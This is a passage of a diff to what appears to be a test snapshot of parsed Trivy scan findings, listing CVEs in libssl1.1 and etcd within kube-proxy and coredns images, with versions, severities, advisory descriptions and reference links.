"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2018-1099", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-1099", - "https://bugzilla.redhat.com/show_bug.cgi?id=1552717", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1099", - "https://github.com/advisories/GHSA-wf43-55jj-vwq8", - "https://github.com/coreos/etcd/commit/a7e5790c82039945639798ae9a3289fe787f5e56", - "https://github.com/coreos/etcd/issues/9353", - "https://github.com/etcd-io/etcd/issues/10479", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JX7QTIT465BQGRGNCE74RATRQLKT2QE4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPGYHMSKDPW5GAMI7BEP3XQRVRLLBJKS/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1099", - "https://www.cve.org/CVERecord?id=CVE-2018-1099", - ], - }, - "category": "Vulnerability", - "description": "DNS rebinding vulnerability found in etcd 3.3.1 and earlier. An attacker can control his DNS records to direct to localhost, and trick the browser into sending requests to localhost (or any other address).", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "etcd: DNS rebinding vulnerability in etcd server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1099", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1099", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1552717", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1099", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-wf43-55jj-vwq8", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://github.com/coreos/etcd/commit/a7e5790c82039945639798ae9a3289fe787f5e56", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/coreos/etcd/issues/9353", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/issues/10479", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JX7QTIT465BQGRGNCE74RATRQLKT2QE4/", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPGYHMSKDPW5GAMI7BEP3XQRVRLLBJKS/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1099", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1099", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.5.0-alpha.5.0.20200423152442-f4b650b51dc4", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-15112", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-15112", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15112", - "https://github.com/advisories/GHSA-m332-53r6-2w93", - "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", - "https://github.com/etcd-io/etcd/commit/7d1cf640497cbcdfb932e619b13624112c7e3865", - "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", - "https://github.com/etcd-io/etcd/pull/11793", - "https://github.com/etcd-io/etcd/security/advisories/GHSA-m332-53r6-2w93", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15112", - "https://pkg.go.dev/vuln/GO-2020-0005", - "https://ubuntu.com/security/notices/USN-5628-1", - "https://ubuntu.com/security/notices/USN-5628-2", - "https://www.cve.org/CVERecord?id=CVE-2020-15112", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "In etcd before versions 3.3.23 and 3.4.10, it is possible to have an entry index greater then the number of entries in the ReadAll method in wal/wal.go. This could cause issues when WAL entries are being read during consensus as an arbitrary etcd consensus participant could go down from a runtime panic when reading the entry.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "etcd: DoS in wal/wal.go", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15112", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15112", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15112", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-m332-53r6-2w93", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/7d1cf640497cbcdfb932e619b13624112c7e3865", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/pull/11793", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/security/advisories/GHSA-m332-53r6-2w93", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15112", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0005", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15112", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.5.0-alpha.5.0.20200423152442-f4b650b51dc4", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-15106", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-15106", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15106", - "https://github.com/advisories/GHSA-p4g4-wgrh-qrg2", - "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", - "https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675", - "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", - "https://github.com/etcd-io/etcd/pull/11793", - "https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15106", - "https://pkg.go.dev/vuln/GO-2020-0005", - "https://ubuntu.com/security/notices/USN-5628-1", - "https://ubuntu.com/security/notices/USN-5628-2", - "https://www.cve.org/CVERecord?id=CVE-2020-15106", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "In etcd before versions 3.3.23 and 3.4.10, a large slice causes panic in decodeRecord method. The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "etcd: Large slice causes panic in decodeRecord method", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15106", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15106", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15106", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p4g4-wgrh-qrg2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675", + "value": 